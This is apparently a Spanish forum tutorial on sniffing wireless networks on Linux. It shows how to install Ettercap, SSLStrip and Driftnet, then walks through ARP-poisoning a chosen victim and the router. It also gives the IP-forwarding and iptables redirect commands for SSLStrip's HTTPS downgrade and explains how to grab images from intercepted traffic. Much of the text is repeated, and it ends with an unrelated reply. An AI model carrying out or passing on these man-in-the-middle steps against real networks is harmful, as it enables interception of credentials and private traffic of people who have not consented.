Autor
HOW TO: SNIFFING EN LINUX (ETTERCAP+SSLSTRIP+DRIFTNET)
INTRODUCIÓN
Con este manual se pretende mostrar el funcionamiento de tres herramientas básicas de sniffing en el entorno linux.
- Ettercap:es un interceptor/sniffer/registrador para LANs con switch. Descargar Aquí (NG-0.7.3)
- SSLStrip:una herramienta que automatiza el ataque sobre la conexión SSL. Descargar Aquí (0.7)
- Driftnet:programa que escucha el tráfico de red y elige imágenes de flujos TCP que observa.Descargar Aquí (0.1.6)
INSTALACIÓN DE HERRAMIENTAS
ETTERCAP
Modo 1 (Recomendado):
Modo 2:
SSLSTRIP
Modo 1 (Recomendado):
DRIFTNET
Modo 1 (NO Recomendado):
Modo 2 (Recomendado):
EMPEZAMOS A USAR LAS HERRAMIENTAS
Bueno en este manual vamos hacer un supuesto de sniffing en una red inalámbrica (En este caso la mia xD)
Empecemos....
Parte 1 [Uso de Ettercap]
Uso General (Análisis de Tráfico)
Uso de Filtros
"PROXIMAMENTE"
Parte 2 [Uso de SSLSTRIP]
Parte 3 [Uso de Driftnet]
Próximamente actualizare el tema para que quede más detallado y añadiré algunas fotografías, para dudas o proposiciones (indebidas no gracias xD!) estaré encantado de recibirlas i también esperare actualizaciones
P.D=Arreglado lo del puerto xD
Con este manual se pretende mostrar el funcionamiento de tres herramientas básicas de sniffing en el entorno linux.
- Ettercap:es un interceptor/sniffer/registrador para LANs con switch. Descargar Aquí (NG-0.7.3)
- SSLStrip:una herramienta que automatiza el ataque sobre la conexión SSL. Descargar Aquí (0.7)
- Driftnet:programa que escucha el tráfico de red y elige imágenes de flujos TCP que observa.Descargar Aquí (0.1.6)
INSTALACIÓN DE HERRAMIENTAS
ETTERCAP
Modo 1 (Recomendado):
Código:
wget http://downloads.sourceforge.net/project/ettercap/ettercap/NG-0.7.3/ettercap-NG-0.7.3.tar.gz?use_mirror=heanet
tar zxvf ettercap-NG-0.7.3.tar.gz
cd ettercap-NG-0.7.3/
./configure
make clean
make
make install
tar zxvf ettercap-NG-0.7.3.tar.gz
cd ettercap-NG-0.7.3/
./configure
make clean
make
make install
Modo 2:
Código:
sudo apt-get install ettercap
SSLSTRIP
Modo 1 (Recomendado):
Código:
wget http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.7.tar.gz
tar zxvf sslstrip-0.7.tar.gz
cp -R sslstrip-0.7 /usr/bin/
tar zxvf sslstrip-0.7.tar.gz
cp -R sslstrip-0.7 /usr/bin/
DRIFTNET
Modo 1 (NO Recomendado):
Código:
wget http://www.ex-parrot.com/~chris/driftnet/driftnet-0.1.6.tar.gz
tar zxvf driftnet-0.1.6.tar.gz
cd driftnet-0.1.6
make
make install
tar zxvf driftnet-0.1.6.tar.gz
cd driftnet-0.1.6
make
make install
Modo 2 (Recomendado):
Código:
apt-get install driftnet
EMPEZAMOS A USAR LAS HERRAMIENTAS
Bueno en este manual vamos hacer un supuesto de sniffing en una red inalámbrica (En este caso la mia xD)
Empecemos....
Parte 1 [Uso de Ettercap]
Uso General (Análisis de Tráfico)
Código:
1.Vamos a una shell
2. Ejecutamos el Ettercap : sudo ettercap -C
3.Sniff/Unified sniffing...(Imagen 1.1)
4.Escribimos el nombre de la interfaz en este caso wlan0 (para saber cual es iwconfig) i enter
5.Hosts/Scan for Hosts (Algunas veces se corta, volver a intentarlo y ya está)
6.Hosts/Host List
7.Seleccionamos el ip que nos interesa y pulsamos 1 y luego seleccionamos el router y pulsamos 2.
(El ip del router es normalmente 192.168.1.1 o 192.168.2.1)
8.Mitm/Arp Poisoning i escribimos "remote"(sin las ")
9.Start/Start Sniffing
10.View/View Connections
11.En este momento estaremos analizando el trafico de la red y en una ip concreta para analizar mas a fondo cada conexión solo hemos de pulsar enter encima, recordar que ahora el análisis no muestra contenido SSL.
2. Ejecutamos el Ettercap : sudo ettercap -C
3.Sniff/Unified sniffing...(Imagen 1.1)
4.Escribimos el nombre de la interfaz en este caso wlan0 (para saber cual es iwconfig) i enter
5.Hosts/Scan for Hosts (Algunas veces se corta, volver a intentarlo y ya está)
6.Hosts/Host List
7.Seleccionamos el ip que nos interesa y pulsamos 1 y luego seleccionamos el router y pulsamos 2.
(El ip del router es normalmente 192.168.1.1 o 192.168.2.1)
8.Mitm/Arp Poisoning i escribimos "remote"(sin las ")
9.Start/Start Sniffing
10.View/View Connections
11.En este momento estaremos analizando el trafico de la red y en una ip concreta para analizar mas a fondo cada conexión solo hemos de pulsar enter encima, recordar que ahora el análisis no muestra contenido SSL.
Uso de Filtros
"PROXIMAMENTE"
Parte 2 [Uso de SSLSTRIP]
Código:
1.Accedemos a la carpeta del ssl strip, en nuestro caso (cd /usr/bin/sslstrip-0.7)
2.En la consola su y después echo "1" > /proc/sys/net/ipv4/ip_forward (Activar redirección de paquetes)
3.Después escribimos iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 44444 (Redireccionamos todo el tráfico del puerto 80 al puerto XXXX(44444)
4.Escribimos ls y luego CAT sslstrip.py (Gracias mokoMonster)
5.Esccribimos SUDO python sslstrip.py -l 44444 y ya estamos "capturando " contenido SSL
2.En la consola su y después echo "1" > /proc/sys/net/ipv4/ip_forward (Activar redirección de paquetes)
3.Después escribimos iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 44444 (Redireccionamos todo el tráfico del puerto 80 al puerto XXXX(44444)
4.Escribimos ls y luego CAT sslstrip.py (Gracias mokoMonster)
5.Esccribimos SUDO python sslstrip.py -l 44444 y ya estamos "capturando " contenido SSL
Parte 3 [Uso de Driftnet]
Código:
1.Escribimos en la consola sudo driftnet -i wlan0 (Donde wlan0 el nombre de la interfraz)
2.Para guardar una imagen pulsar encima
2.Para guardar una imagen pulsar encima
Próximamente actualizare el tema para que quede más detallado y añadiré algunas fotografías, para dudas o proposiciones (indebidas no gracias xD!) estaré encantado de recibirlas i también esperare actualizaciones
P.D=Arreglado lo del puerto xD
En línea
Asi que lo puedo probar por tu, que dices? nos unimos ?
